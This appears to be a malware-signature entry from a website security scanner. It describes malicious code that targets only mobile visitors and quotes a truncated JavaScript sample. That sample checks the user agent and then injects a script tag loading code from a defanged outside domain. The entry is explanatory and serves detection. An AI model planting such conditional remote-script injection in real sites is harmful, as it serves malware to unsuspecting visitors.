Description:
Detected malicious code that targets only visitors that use mobile devices. Typically malware checks either User-Agent header or screen dimensions to determine whether a mobile browser is used.
Malware that targets mobile users may use rewrite rules in .htaccess files, server-side scripts (e.g. PHP, ASP, etc) or client-side script (e.g. JavaScript).
Example of JavaScript based mobile malware
function isMobile() {
var a = (navigator.userAgent||navigator.vendor||window.opera);
if(/android.+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip
...skipped...
|nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i.test(a.substr(0,4))){
return true;
}
return false;
}
if(isMobile() === true) {document .write('<script type="text/javascript" src="hxxp://tizermedias[.]com/odessa/?H6rRyf"></script>');
Affecting: Any web site (no specific target).